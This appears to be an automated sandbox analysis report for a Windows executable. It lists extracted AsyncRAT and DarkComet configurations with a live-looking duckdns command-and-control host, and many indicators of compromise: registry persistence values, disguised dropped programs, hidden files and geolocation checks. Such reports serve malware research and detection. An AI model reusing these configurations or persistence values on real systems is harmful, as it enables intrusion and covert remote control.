Analysis
-
max time kernel
19s -
max time network
60s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
21/04/2025, 19:20
General
-
Target
9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe
-
Size
1018KB
-
MD5
eceb6e1e8aa84e6501589dc1d3deb419
-
SHA1
467a412530d7af26b01ec278d7d325e4b6dd047a
-
SHA256
9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236
-
SHA512
be256564941a092d73b6931dfa0a238b17d68c69e1742b98844e43fa3010db83bf9d52922912e127cd9b6cd1bbf9ecd39c4a36c2da676ca060bf21ffef8b27bf
-
SSDEEP
24576:pji1+TKiRzC0NqgGApfkxIpePcvkTR8cvkTAU:pu1+miRnQjALpe0vkTNvkTN
Malware Config
Extracted
asyncrat
0.5.8
Default
jvjv2044duck33.duckdns.org:8808
0fC8zJGwBBNm
-
delay
3
-
install
true
-
install_file
csrss.exe
-
install_folder
%AppData%
Extracted
darkcomet
Guest16
jvjv2044duck33.duckdns.org:1604
DC_MUTEX-CK7UE3N
-
InstallPath
MSDCSC\msdcsc.exe
-
gencode
Jp74nsvbhc4i
-
install
true
-
offline_keylogger
true
-
persistence
true
-
reg_key
MicroUpdate
Signatures
-
Asyncrat family
-
Darkcomet family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" VLC1.EXE -
Nanocore family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x0007000000024273-100.dat family_asyncrat -
Disables Task Manager via registry modification
-
Sets file to hidden 1 TTPs 5 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2896 attrib.exe 4596 attrib.exe 3604 attrib.exe 1184 attrib.exe 4884 attrib.exe -
Checks computer location settings 2 TTPs 64 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation LEGIT_SOFTWARE2.EXE Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation WINDOWS DEFENDER.EXE Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation LEGIT_SOFTWARE1.EXE Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation FILE5.EXE Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation Rundll32.exe -
Executes dropped EXE 64 IoCs
pid Process 1592 FILE5.EXE 8 JOKE.EXE 4804 ULTIME MULTIHACK REBORN.EXE 4580 JOKE2.EXE 4660 LEGIT_SOFTWARE1.EXE 4740 LEGIT_SOFTWARE2.EXE 4844 VLC1.EXE 4992 SENDE2R.EXE 2800 WINDOWS DEFENDER.EXE 5976 WINDOWS SECURITY NANO.EXE 2496 Rundll32.exe 3088 Rundll32.exe 5164 msdcsc.exe 2100 Rundll32.exe 2912 msdcsc.exe 1000 Rundll32.exe 1784 msdcsc.exe 3188 Rundll32.exe 5708 Rundll32.exe 5780 Rundll32.exe 5464 Rundll32.exe 5664 Rundll32.exe 4400 Rundll32.exe 2392 Rundll32.exe 3824 Rundll32.exe 3204 Rundll32.exe 5284 Rundll32.exe 2232 Rundll32.exe 5664 Rundll32.exe 828 Rundll32.exe 5552 Rundll32.exe 4384 Rundll32.exe 2676 Rundll32.exe 2392 Rundll32.exe 4516 Rundll32.exe 5328 Rundll32.exe 1652 Rundll32.exe 4300 Rundll32.exe 2716 Rundll32.exe 5460 Rundll32.exe 5508 Rundll32.exe 5404 Rundll32.exe 3748 Rundll32.exe 3228 Rundll32.exe 5912 Rundll32.exe 4788 Rundll32.exe 3876 Rundll32.exe 1796 csrss.exe 912 Rundll32.exe 3152 Rundll32.exe 2444 Rundll32.exe 1624 Rundll32.exe 660 Rundll32.exe 2852 Rundll32.exe 1800 Rundll32.exe 3908 Rundll32.exe 5528 Rundll32.exe 3812 Rundll32.exe 1524 Rundll32.exe 4496 Rundll32.exe 3700 Rundll32.exe 5228 msdcsc.exe 5052 Rundll32.exe 5284 Rundll32.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FindMe = "C:\\Windows\\Temp\\svchost_533423.exe" WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FindMe = "C:\\Users\\Public\\Documents\\winservice_533423.exe" WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" VLC1.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DNS Manager = "C:\\Program Files (x86)\\DNS Manager\\dnsmgr.exe" WINDOWS SECURITY NANO.EXE Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" msdcsc.exe -
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WINDOWS SECURITY NANO.EXE -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File opened for modification C:\Windows\SysWOW64\config\Rundll32.exe SENDE2R.EXE -
resource yara_rule behavioral1/files/0x0002000000022b76-84.dat upx behavioral1/memory/4844-96-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5164-214-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/2912-225-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/2912-250-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/4844-279-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/1784-283-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/1784-292-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5164-332-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5164-465-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5228-477-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral1/memory/5228-481-0x0000000000400000-0x00000000004B7000-memory.dmp upx -
Drops file in Program Files directory 6 IoCs
description ioc Process File created C:\Program Files (x86)\DNS Manager\dnsmgr.exe WINDOWS SECURITY NANO.EXE File opened for modification C:\Program Files (x86)\DNS Manager\dnsmgr.exe WINDOWS SECURITY NANO.EXE File created C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE FILE5.EXE File created C:\Program Files (x86)\VLC1.EXE FILE5.EXE File created C:\Program Files (x86)\WINDOWS DEFENDER.EXE FILE5.EXE File created C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE FILE5.EXE -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
pid Process 5740 powershell.exe 1076 powershell.exe 1728 powershell.exe 5636 powershell.exe 2472 powershell.exe 5724 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINDOWS SECURITY NANO.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FILE5.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINDOWS DEFENDER.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csrss.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LEGIT_SOFTWARE2.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SENDE2R.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JOKE2.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Delays execution with timeout.exe 10 IoCs
pid Process 3220 timeout.exe 5704 timeout.exe 4956 timeout.exe 1208 timeout.exe 3676 timeout.exe 2404 timeout.exe 4996 timeout.exe 436 timeout.exe 5392 timeout.exe 2940 timeout.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Internet Explorer\Main reg.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ VLC1.EXE -
Modifies registry key 1 TTPs 1 IoCs
pid Process 828 reg.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5532 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5976 WINDOWS SECURITY NANO.EXE 5976 WINDOWS SECURITY NANO.EXE 5976 WINDOWS SECURITY NANO.EXE 5976 WINDOWS SECURITY NANO.EXE 1076 powershell.exe 1076 powershell.exe 1728 powershell.exe 1728 powershell.exe 5740 powershell.exe 5740 powershell.exe 5636 powershell.exe 5636 powershell.exe 2472 powershell.exe 2472 powershell.exe 5976 WINDOWS SECURITY NANO.EXE 5976 WINDOWS SECURITY NANO.EXE 5976 WINDOWS SECURITY NANO.EXE 5976 WINDOWS SECURITY NANO.EXE 4804 ULTIME MULTIHACK REBORN.EXE 4804 ULTIME MULTIHACK REBORN.EXE 1076 powershell.exe 5724 powershell.exe 5724 powershell.exe 4804 ULTIME MULTIHACK REBORN.EXE 5740 powershell.exe 4804 ULTIME MULTIHACK REBORN.EXE 1728 powershell.exe 5636 powershell.exe 4804 ULTIME MULTIHACK REBORN.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 2800 WINDOWS DEFENDER.EXE 4804 ULTIME MULTIHACK REBORN.EXE 4804 ULTIME MULTIHACK REBORN.EXE 5976 WINDOWS SECURITY NANO.EXE 5976 WINDOWS SECURITY NANO.EXE 5976 WINDOWS SECURITY NANO.EXE 5976 WINDOWS SECURITY NANO.EXE 4804 ULTIME MULTIHACK REBORN.EXE 4804 ULTIME MULTIHACK REBORN.EXE 4804 ULTIME MULTIHACK REBORN.EXE 4804 ULTIME MULTIHACK REBORN.EXE 2472 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 5976 WINDOWS SECURITY NANO.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
